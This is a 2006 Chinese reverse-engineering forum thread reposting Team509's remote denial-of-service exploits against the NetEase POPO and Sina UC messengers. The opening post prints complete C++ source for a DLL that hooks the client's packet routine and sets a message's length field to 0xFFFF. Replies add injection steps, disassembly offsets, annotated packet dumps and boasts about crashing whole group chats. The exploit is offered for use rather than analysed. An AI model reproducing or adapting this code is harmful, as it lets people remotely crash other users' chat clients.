首页
社区
课程
招聘
[推荐][转帖]网易 POPO 和 Sina UC 2006 的远程 Dos by Team509
发表于: 2006-12-2 12:43 8716

[推荐][转帖]网易 POPO 和 Sina UC 2006 的远程 Dos by Team509

2006-12-2 12:43
8716
网易 POPO
http://www.team509.com/modules.php?name=News&file=article&sid=41

操作方法跟UC的那个差不多,唯一的区别就是team509这几个字要放到最前面,那

个dll在这儿下载:http://www.team509.com/popoDos.dll

没什么好写的,把source code贴出来吧,需定义基地址为:0x50000000.

// popoDos.cpp : 定义 DLL 应用程序的入口点。
//
#include "stdafx.h"
#include "Winbase.h"
extern "C" __declspec(dllexport)  void  __fastcall my_pack(unsigned char *thiscall,unsigned char *nouse,unsigned char * src,unsigned int len);
void  __fastcall my_pack(unsigned char *thiscall,unsigned char *nouse,unsigned char * src,unsigned int len)
{
   
   
    int real_pack = 0xcc5a90 ;
    for (int i = 0 ; i< 0xff ; i++)
    {
       if(memcmp((const void *)(src+i),"team509",7) == 0)
       {
           *(src+i-1) = 0xff;
           *(src+i-2) = 0xff;
       }
    }
    __asm{
              mov ecx,thiscall
              push len
              push src
              call real_pack
              add esp,0x100
              
              add ebp,0xa0
              ret 8
              
       }
}
void writemem()
{
       unsigned char packaddr[] = "xe9xe0x34x4f";
           HANDLE hProcess = GetCurrentProcess ();
       DWORD dwWritten = 0;
                  
           WriteProcessMemory (hProcess,
                            (VOID *)0xcc3689,
                            (VOID *)packaddr,
                            4,
                            &dwWritten);
}
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                   )
{
   unsigned int offset = 0 ;
      
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
     
       writemem();
      
    }
   
    return TRUE;
}

[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

收藏
免费 7
支持
分享
最新回复 (15)
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
2
Sina UC 2006
http://www.team509.com/modules.php?name=News&file=article&sid=40

我也测试过2005III,这个问题也存在的,漏洞细节不描述了,有心人可以根据现象一望而知,

主要描述一下做法:

我也测试过2005III,这个问题也存在的,漏洞细节不描述了,有心人可以根据现象一望而知,

主要描述一下做法:

1.  你本地需要一个UC 的2005III版

2.  启动它,把这个DLL(http://www.team509.com/sinaDos.dll)注入UC的进程内,恩,这个dll注入工具我是使用remotelib,google出来的第一个就是了。

3.  找到一个在线的联系人,送文本消息给他,恩,这个消息最后7个字符得是”team509”这7字真言,J

4.  这个联系人的UC马上就崩溃了,赫赫。
2006-12-2 12:43
0
雪    币: 279
活跃值: (145)
能力值: ( LV9,RANK:290 )
在线值:
发帖
回帖
粉丝
3

强.
2006-12-2 12:45
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
4
刚刚下载了个popo学习一下,偏移地址有一些变化
00CE367D               52                push edx
00CE367E               8B45 BC           mov eax,dword ptr ss:[ebp-44]
00CE3681               50                push eax
00CE3682               8B4D EC           mov ecx,dword ptr ss:[ebp-14]
00CE3685               8B49 08           mov ecx,dword ptr ds:[ecx+8]
00CE3688               E8 03240000       call SOX.00CE5A90

这里是发前明码协议的地方
只要把聊天包的长度的WORD改成FFFF,对方就crash了
02073F28            3E 02 F5 0B 2A 00 06 00 18 00 40 00 00 00 0E 00  >?*...@....
02073F38            19 00 74 75 72 62 6F 38 36 33 34 31 7A 68 40 70  .turbo86341zh@p
02073F48            6F 70 6F 2E 31 36 33 2E 63 6F 6D 1F 00 04 00 00  opo.163.com...
02073F58            00 01 00 04 00 CB CE CC E5 02 00 01 00 30 03 00  ...宋体..0.
02073F68            01 00 30 04 00 05 00 68 65 6C 6C 6F 00 00 00 00  .0..hello....                  
                                   FF FF

对隐身和不在线的也要效
2006-12-2 13:42
0
雪    币: 120
活跃值: (30)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
新版的淘宝旺旺的help->about也有他们的名字,据称还有MSN的漏洞(说是可以远程溢出),不知道他们什么时候能放出来,好像他们对IM很有一套
2006-12-2 13:48
0
雪    币: 254
活跃值: (126)
能力值: ( LV8,RANK:130 )
在线值:
发帖
回帖
粉丝
6
有qq的吗
2006-12-2 16:07
0
雪    币: 398
活跃值: (343)
能力值: (RANK:650 )
在线值:
发帖
回帖
粉丝
7
网易泡泡在组里面(相当QQ的群)也可以这么玩
聊天室100多人直接踢馆
2006-12-2 16:09
0
雪    币: 331
活跃值: (56)
能力值: ( LV13,RANK:410 )
在线值:
发帖
回帖
粉丝
8
你改行搞Hack了?
2006-12-2 17:54
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
听说新浪UC有在线脱衣看的.在加密房间里的.
2006-12-2 23:12
0
雪    币: 224
活跃值: (147)
能力值: ( LV9,RANK:970 )
在线值:
发帖
回帖
粉丝
10
最初由 根太软 发布
听说新浪UC有在线脱衣看的.在加密房间里的.

2006-12-2 23:28
0
雪    币: 82
活跃值: (531)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
11
耳听为虚``眼见为实

2006-12-3 08:47
0
雪    币: 2003
活跃值: (61)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
12
丫真流氓 ... 也就是用发包器对一个网段发 FFFF也成了...
2006-12-3 13:55
0
雪    币: 120
活跃值: (30)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
13
shoooo的意思是要在加密前,不能直接发ffff的。
2006-12-4 16:27
0
雪    币: 146
活跃值: (72)
能力值: ( LV4,RANK:50 )
在线值:
发帖
回帖
粉丝
14
最初由 Isaiah 发布
你改行搞Hack了?


其实Cracker和Hacker是没有严格的区别的.
2006-12-4 19:54
0
雪    币: 1309
活跃值: (232)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
15
原贴和dll 已经没了
2006-12-4 21:22
0
雪    币: 200
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
16
   

   没有成功..  用哪个 remotelib 的哪个函数注入呢?

uc 2005 iii

Calling: RemoteLoadLibrary((HWND)0x00030270, _T("E:\dll\sinaDos.dll"));
Function succeeded. Return value: 0x30000000

可是 还是    失败

发送 以那个《 这个消息最后7个字符得是”team509”这7字真言》  还是 对方没有效果  呵呵!!

失败!  谁指点 指点??
2006-12-5 12:06
0
游客
登录 | 注册 方可回帖
返回
//